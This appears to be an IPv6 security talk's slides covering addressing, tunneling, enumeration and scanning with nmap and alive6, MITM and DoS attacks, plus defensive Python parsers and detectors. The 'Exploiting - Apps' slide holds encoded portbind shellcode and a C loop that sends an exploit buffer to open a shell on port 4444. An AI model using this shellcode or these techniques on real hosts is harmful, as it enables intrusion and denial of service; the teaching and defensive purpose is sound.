IPv6 Fundamentals & Securities

Don Anto
IPSECS.COM
Who?

• Don Anto
• Information security manager
• JNCIP-SEC, GSEC, GCIH, GCIA, GPEN, TOGAF
• A dead security researcher
• Involved in the security field for almost 10 years
• Genius evil thinker; professional troublemaker
• @djantoxz
IPv6 - Why?

• Analog to digital convergence (e.g. Voice over IP)
• The use of virtualization (e.g. cloud)
• Embedded device (smartphone, RFID) networking
• All increase the need for unique IP addresses
• So, more IP address space is required!
• Finally, IPv4 address exhaustion
IPv6 - What?

• The latest version of the Internet Protocol (IP), intended to replace IPv4
• 128-bit IP addressing instead of 32-bit, to multiply the IP address space
• IPv4 = 2^32 (4,294,967,296) >< IPv6 = 2^128 (about 3.4×10^38)
• Dotted decimal is not used anymore; hexadecimal groups separated by colons are used instead
• E.g.:
   • 2001:2c0:cc00:6a01:2d0:b7ff:fe75:d092
   • 2001:470:0:64::2
   • fe80::1
IPv6 Fundamentals

[Figure: IPv6 header layout. Source: Fernando Gont presentation]

• IPv6 header: 40 bytes, fixed length
• Source address 16 bytes, destination address 16 bytes
• 8 bytes for version, traffic class, flow label, payload length, next header & hop limit
IPv6 Fundamentals

• IPv6 address types:
   • Loopback
   • Unspecified
   • Multicast
   • Anycast
   • Local unicast
   • Global unicast
• Subnetting
• Routing

[Figure. Source: Fernando Gont presentation]
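The 40-byte fixed header and the address types from the two slides above, as an added Python example that is not part of the original deck: it serializes and decodes the header fields in the order the slide lists them and classifies addresses into the slide's types. The sample packet is constructed, and anycast cannot be told apart from unicast syntactically.

```python
"""Added example: decode the fixed 40-byte IPv6 header and classify addresses."""
import ipaddress
import struct

IPV6_HEADER_LEN = 40   # fixed length; extension headers are chained via Next Header


def build_ipv6_packet(src, dst, next_header, payload, hop_limit=64,
                      traffic_class=0, flow_label=0):
    """Serialize a minimal IPv6 packet (used here to construct sample input)."""
    # First 32 bits: 4-bit version, 8-bit traffic class, 20-bit flow label.
    first_word = (6 << 28) | ((traffic_class & 0xFF) << 20) | (flow_label & 0xFFFFF)
    # Next 32 bits: 16-bit payload length, 8-bit next header, 8-bit hop limit.
    header = struct.pack("!IHBB", first_word, len(payload), next_header, hop_limit)
    header += ipaddress.IPv6Address(src).packed     # 16-byte source address
    header += ipaddress.IPv6Address(dst).packed     # 16-byte destination address
    return header + payload


def parse_ipv6_header(packet):
    """Decode the 40-byte fixed header; raise ValueError on malformed input."""
    if len(packet) < IPV6_HEADER_LEN:
        raise ValueError("truncated IPv6 header")
    first_word, payload_len, next_header, hop_limit = struct.unpack("!IHBB", packet[:8])
    version = first_word >> 28
    if version != 6:
        raise ValueError(f"not an IPv6 packet (version {version})")
    if len(packet) < IPV6_HEADER_LEN + payload_len:
        raise ValueError("payload length field exceeds captured bytes")
    return {
        "version": version,
        "traffic_class": (first_word >> 20) & 0xFF,
        "flow_label": first_word & 0xFFFFF,
        "payload_length": payload_len,
        "next_header": next_header,           # 58 = ICMPv6, 6 = TCP, 17 = UDP
        "hop_limit": hop_limit,
        "src": ipaddress.IPv6Address(packet[8:24]),
        "dst": ipaddress.IPv6Address(packet[24:40]),
        "payload": packet[IPV6_HEADER_LEN:IPV6_HEADER_LEN + payload_len],
    }


def classify(address):
    """Map an address to the slide's type list.

    Anycast addresses are syntactically indistinguishable from unicast, so
    they cannot be detected here and come back as the matching unicast type.
    """
    a = ipaddress.IPv6Address(address)
    if a.is_unspecified:
        return "unspecified"                  # ::
    if a.is_loopback:
        return "loopback"                     # ::1
    if a.is_multicast:
        return "multicast"                    # ff00::/8
    if a.is_link_local:
        return "link-local unicast"           # fe80::/10
    if a in ipaddress.IPv6Network("fc00::/7"):
        return "unique local unicast"         # fc00::/7 (ULA)
    if a in ipaddress.IPv6Network("2000::/3"):
        return "global unicast"               # currently allocated global range
    return "reserved/other"


if __name__ == "__main__":
    # Constructed sample: ICMPv6 (next header 58) echo request to all-nodes
    # multicast, like the ping6 to ff02::1 on the Enumeration slide.
    echo_request = bytes.fromhex("8000 0000 beef 0001")
    pkt = build_ipv6_packet("fe80::a00:27ff:fe39:6f0a", "ff02::1", 58, echo_request)
    hdr = parse_ipv6_header(pkt)
    print(f"{len(pkt) - hdr['payload_length']}-byte header, next header {hdr['next_header']}")
    for addr in ("::", "::1", "ff02::1", "fe80::1", "fd00::1", "2001:470:0:64::2"):
        print(f"{addr:>20}  {classify(addr)}")
```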
v4 >< v6

[Figure. Source: Fernando Gont presentation]
v4 to v6

• Dual-stack systems support IPv4 & IPv6 concurrently
• Tunneling mechanisms encapsulate IPv6 inside IPv4
   • 6to4, 6in4, Teredo, ISATAP
• Network Address Translation (NAT)
   • Network Address Translation – Protocol Translation (NAT-PT)
   • Network Address Translation IPv6 to IPv4 (NAT64)
• Free IPv6 tunnel brokers?
Security Issues

• Large IPv6 address space (enumeration, scanning, managing)
• The use of tunneling? The use of dual-stack networking?
• Weaknesses in IPv6 itself? (protocol-level vulnerabilities)
• Weaknesses of applications running over IPv6
Enumeration

• Discovery through the all-nodes multicast address (FF02::1)
• Discovery through ICMPv6 Echo Request
• Discovery through DNS queries (A >< AAAA)
• Discovery through SNMP queries
• Google helps us to find IPv6 domains
• The presence of an IPAM may help

    ipv6lab->./alive6 eth4
    Alive: dead:beaf::3
    Alive: dead:beaf::1
    Found 2 systems alive

    ipv6lab->host -t A www.jp.freebsd.org
    www.jp.freebsd.org has address 119.245.129.228
    ipv6lab->host -t AAAA www.jp.freebsd.org
    www.jp.freebsd.org has IPv6 address 2001:2c0:cc00:6a01:2d0:b7ff:fe75:d092

    ipv6lab->ping6 -I eth4 ff02::1
    PING ff02::1(ff02::1) from fe80::a00:27ff:fe39:6f0a eth4: 56 data bytes
    64 bytes from fe80::a00:27ff:fe39:6f0a: icmp_seq=1 ttl=64 time=0.034 ms
    64 bytes from fe80::a00:27ff:fe96:da90: icmp_seq=1 ttl=64 time=1.70 ms (DUP!)
    64 bytes from fe80::a00:27ff:fe6c:ea37: icmp_seq=1 ttl=64 time=2.58 ms (DUP!)
    ipv6lab->ip -6 neigh show
    fe80::a00:27ff:fe96:da90 dev eth4 lladdr 08:00:27:96:da:90 REACHABLE
    fe80::a00:27ff:fe6c:ea37 dev eth4 lladdr 08:00:27:6c:ea:37 REACHABLE
Scanning

• Port scanning (tools with IPv6 support)
• Vulnerability scanning (tools with IPv6 support)
• A v4-to-v6 proxy is usually helpful, e.g. socat (apt-get install socat)

    ipv6lab->nmap -6 -sV -PN -T4 dead:beaf::3

    Starting Nmap 5.00 ( http://nmap.org ) at 2013-01-15 15:50 WIT
    Interesting ports on dead:beaf::3:
    Not shown: 999 closed ports
    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 5.9 (protocol 2.0)

    ipv6lab->nmap -sV -PN -T4 192.168.137.103

    Starting Nmap 5.00 ( http://nmap.org ) at 2013-01-15 15:50 WIT
    Interesting ports on 192.168.137.103:
    Not shown: 998 closed ports
    PORT STATE SERVICE VERSION
    21/tcp open ftp?
    22/tcp open ssh OpenSSH 5.9 (protocol 2.0)
    MAC Address: 08:00:27:6C:EA:37 (Cadmus Computer Systems)
Perimeter Defense Bypass

• Does the firewall protect both the IPv4 and the IPv6 network?
• Does the IDS/IPS protect both the IPv4 and the IPv6 network?
• Teredo tunneling can be used to bypass NAT and to compromise the internal network
• The use of dual stack and tunneling mandates protection for both IPv4 and IPv6
Perimeter Defense Bypass

• IPv4 is well governed by the firewall using NAT or policies
• A poorly configured firewall can potentially be bypassed to reach the DMZ over the IPv6 network
• Even worse, someone may directly access the internal network from the Internet
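One way to check the v4/v6 parity the two slides call for, as an added example that is not from the deck: it compares IPv4 rules in `iptables -S` form with the IPv6 set and reports what is open over v6 but filtered over v4 (and the reverse). Both rule sets below are constructed samples, not a real host's configuration.

```python
"""Added example: report IPv4/IPv6 filter-policy mismatches on a dual-stack host."""
import re

# Constructed sample in `iptables -S` output form: default deny, two services.
IPTABLES_S = """\
-P INPUT DROP
-P FORWARD DROP
-P OUTPUT ACCEPT
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 443 -j ACCEPT
"""

# Constructed `ip6tables -S` sample in the typical "forgot about v6" state:
# default ACCEPT, and a database port exposed that v4 never opened.
IP6TABLES_S = """\
-P INPUT ACCEPT
-P FORWARD ACCEPT
-P OUTPUT ACCEPT
-A INPUT -i lo -j ACCEPT
-A INPUT -p ipv6-icmp -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 3306 -j ACCEPT
"""

POLICY_RE = re.compile(r"^-P (\S+) (\S+)$")
PORT_RULE_RE = re.compile(r"^-A (\S+) .*-p (\S+) .*--dport (\d+) .*-j (\S+)$")
PROTO_RULE_RE = re.compile(r"^-A (\S+) -p (\S+) -j (\S+)$")


def parse_rules(text):
    """Return chain policies, accepted (chain, proto, port) and accepted (chain, proto)."""
    policies, port_accepts, proto_accepts = {}, set(), set()
    for line in text.splitlines():
        line = line.strip()
        if (m := POLICY_RE.match(line)):
            policies[m.group(1)] = m.group(2)
        elif (m := PORT_RULE_RE.match(line)) and m.group(4) == "ACCEPT":
            port_accepts.add((m.group(1), m.group(2), int(m.group(3))))
        elif (m := PROTO_RULE_RE.match(line)) and m.group(3) == "ACCEPT":
            proto_accepts.add((m.group(1), m.group(2)))
    return policies, port_accepts, proto_accepts


def compare_policies(v4_text, v6_text):
    """List parity problems between the IPv4 and IPv6 rule sets."""
    v4_pol, v4_ports, _ = parse_rules(v4_text)
    v6_pol, v6_ports, v6_protos = parse_rules(v6_text)
    findings = []
    for chain in ("INPUT", "FORWARD"):
        if v4_pol.get(chain) == "DROP" and v6_pol.get(chain) != "DROP":
            findings.append(f"{chain}: IPv4 default DROP but IPv6 default "
                            f"{v6_pol.get(chain, 'unset')}; everything not listed is open over v6")
    for chain, proto, port in sorted(v6_ports - v4_ports):
        findings.append(f"{chain}: {proto}/{port} accepted over IPv6 but not over IPv4")
    for chain, proto, port in sorted(v4_ports - v6_ports):
        findings.append(f"{chain}: {proto}/{port} accepted over IPv4 but not over IPv6")
    # Mirroring v4 blindly is also wrong: ICMPv6 carries Neighbor Discovery,
    # so dropping it breaks address resolution and router discovery.
    if ("INPUT", "ipv6-icmp") not in v6_protos:
        findings.append("INPUT: no ICMPv6 accept rule; Neighbor Discovery will break")
    return findings


if __name__ == "__main__":
    for finding in compare_policies(IPTABLES_S, IP6TABLES_S):
        print("-", finding)
```

On a live host the same function can be fed the real output of `iptables -S` and `ip6tables -S`; nftables rule sets would need a different parser.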
Exploiting - Protocols

• IPv6 was also designed to improve on the security of IPv4; unfortunately there is no significant improvement
• Some problems of IPv4 persist in IPv6
• Man-in-the-middle attacks
• Denial of service attacks
• More and more
Man In The Middle

• Spoofed ICMPv6 Neighbor Advertisement (Neighbor Discovery replaces ARP of v4)
• Spoofed ICMPv6 Router Advertisement
• Spoofed ICMPv6 Redirect or ICMPv6 Packet Too Big to implant routing
• Rogue DHCPv6 server (replacing the rogue DHCP server of v4)
• More and more

[Figure: used to help packet sniffing. Source image: OWASP website]
Denial of Services

• Traffic flooding with ICMPv6 RA, NA, NS, MLD; smurfing
• Preventing new IPv6 addresses with DAD
• CPU exhaustion with ICMPv6 NS and a lot of crypto stuff
• Routing loop attacks utilizing automatic tunneling
• ICMP attacks against TCP to tear down BGP sessions

    anto# ifstat -b
           eth0
     Kbps in  Kbps out
     9851.48      1.08
    10244.34      0.95
    10313.33      0.95
     9165.56      0.95
     9358.11      0.95
    10165.01      0.95
     9802.98      0.95
     9353.34      0.95

    anto# tcpdump -n -i eth0 dst host dead:beaf::3

    20:39:48.442267 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
    20:39:48.442290 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
    20:39:48.442314 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
    20:39:48.442337 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
    20:39:48.442585 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24

    4700 packets captured
    4884 packets received by filter
    93 packets dropped by kernel
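Detection logic for the ND spoofing on the Man In The Middle slide and the ICMPv6 flooding on the Denial of Services slide, as an added example that is not from the deck: it runs over tcpdump -n lines in the format shown above and flags multicast source addresses (the smurf pattern in the capture), per-second echo floods, router advertisements from nodes that are not known routers, and one address advertised by two neighbors. The capture, KNOWN_ROUTERS and FLOOD_THRESHOLD are constructed assumptions for the sample.

```python
"""Added example: flag ICMPv6 ND spoofing and flooding in tcpdump -n output."""
import ipaddress
import re
from collections import Counter, defaultdict

# Constructed capture in the slide's tcpdump format (not a real network trace).
SAMPLE_CAPTURE = """\
20:39:48.442267 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:48.442290 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:48.442314 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24
20:39:49.100001 IP6 fe80::1 > ff02::1: ICMP6, router advertisement, length 56
20:39:49.200002 IP6 fe80::a00:27ff:fe96:da90 > ff02::1: ICMP6, router advertisement, length 56
20:39:50.000003 IP6 fe80::a00:27ff:fe6c:ea37 > ff02::1: ICMP6, neighbor advertisement, tgt is dead:beaf::1, length 32
20:39:50.000004 IP6 fe80::a00:27ff:fe96:da90 > ff02::1: ICMP6, neighbor advertisement, tgt is dead:beaf::1, length 32
20:39:51.000005 IP6 dead:beaf::1 > dead:beaf::3: ICMP6, echo reply, seq 1, length 24
"""

KNOWN_ROUTERS = {"fe80::1"}   # assumed link-local address of the legitimate gateway
FLOOD_THRESHOLD = 3           # echo requests per destination per second; low for the sample

LINE_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d)\.\d+ IP6 (?P<src>[0-9a-f:]+) > (?P<dst>[0-9a-f:]+): "
    r"ICMP6, (?P<msg>[^,]+)(?P<rest>.*)$"
)
TARGET_RE = re.compile(r"tgt is ([0-9a-f:]+)")


def parse_line(line):
    """Split one tcpdump line into timestamp, addresses, ICMPv6 message and NA target."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    fields = m.groupdict()
    t = TARGET_RE.search(fields["rest"])
    fields["tgt"] = t.group(1) if t else None
    return fields


def analyse(lines, known_routers=KNOWN_ROUTERS, flood_threshold=FLOOD_THRESHOLD):
    """Return sorted (alert, subject, detail) tuples for the suspicious patterns."""
    alerts = set()
    echo_per_second = Counter()    # (dst, hh:mm:ss) -> echo requests
    na_sources = defaultdict(set)  # NA target -> sources that advertised it
    for line in lines:
        p = parse_line(line)
        if p is None:
            continue
        # A multicast address is never valid as a source (RFC 4291): the smurf
        # on the slide spoofs ff02::1 so that every node answers the victim.
        if ipaddress.IPv6Address(p["src"]).is_multicast:
            alerts.add(("multicast-source", p["src"], f"packets to {p['dst']}"))
        msg = p["msg"].strip()
        if msg == "echo request":
            echo_per_second[(p["dst"], p["ts"])] += 1
        elif msg == "router advertisement" and p["src"] not in known_routers:
            # RA from an unexpected node: rogue-router candidate (what RA Guard blocks).
            alerts.add(("rogue-ra", p["src"], "router advertisement from a non-router"))
        elif msg == "neighbor advertisement" and p["tgt"]:
            na_sources[p["tgt"]].add(p["src"])
    for (dst, second), n in echo_per_second.items():
        if n >= flood_threshold:
            alerts.add(("echo-flood", dst, f"{n} echo requests in second {second}"))
    for tgt, srcs in na_sources.items():
        if len(srcs) > 1:
            # Two nodes claiming one address: NA spoofing, the ARP-poisoning analogue.
            alerts.add(("na-conflict", tgt, "advertised by " + ", ".join(sorted(srcs))))
    return sorted(alerts)


if __name__ == "__main__":
    for alert in analyse(SAMPLE_CAPTURE.splitlines()):
        print(*alert, sep=" | ")
```

Without -v, tcpdump omits the link-layer address option of an NA, so the conflict check keys on the IPv6 source instead; a capture with -v could compare the advertised MAC as well.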
Exploiting - Apps

• Buffer overflow
• Remote format string
• Off-by-one
• Web app attacks
• More attacks?!
• There's no big difference: socket programming & shellcodes
• A v4-to-v6 proxy is usually helpful, e.g. socat (apt-get install socat)

    char shellcode[] = /* Portbind @ 4444 */
    "\xd9\xcc\xbd\x59\x34\x55\x97\xd9\x74\x24\xf4\x5a\x29\xc9"
    "\xb1\x17\x31\x6a\x19\x83\xc2\x04\x03\x6a\x15\xbb\xc1\x64"
    "\x4c\x68\x69\xd4\x18\x84\xe4\x3b\xb6\xfe\xae\x76\xc7\x68"
    "\xd7\xdb\x9a\xc6\xba\x89\x48\x80\x52\x3f\x31\x2a\xcb\x35"
    "\xc9\x3b\xea\x20\xd5\x6a\xbb\x3d\x04\xcf\x29\x58\x9f\x02"
    "\x2d\x14\x79\x2f\x2a\x98\x06\x1d\x61\x74\x8e\x40\xc6\xc8"
    "\xf6\x4f\x49\xbb\xae\x25\x75\xe4\x9d\x39\xc0\x6d\xe6\x51"
    "\xfc\xa2\x65\xc9\x6a\x92\xeb\x60\x05\x65\x08\x22\x8a\xfc"
    "\x2e\x72\x27\x32\x30";

    /* Address-family agnostic client loop: getaddrinfo() fills AddrInfo with
       AF_INET and/or AF_INET6 entries, so the same code reaches v4 and v6
       targets. The fragment does not check the return value of connect(). */
    for(AI=AddrInfo;AI!=NULL;AI=AI->ai_next){
       if((s=socket(AI->ai_family,AI->ai_socktype,AI->ai_protocol))<0){
          printf("can't create socket\n");
          exit(0);
       }
       connect(s,AI->ai_addr,AI->ai_addrlen);
       send(s,buffer,len,0);
       printf("Check your shell on %s TCP port 4444\n",argv[1]);
    }
DEMO
Discussion
Thank You
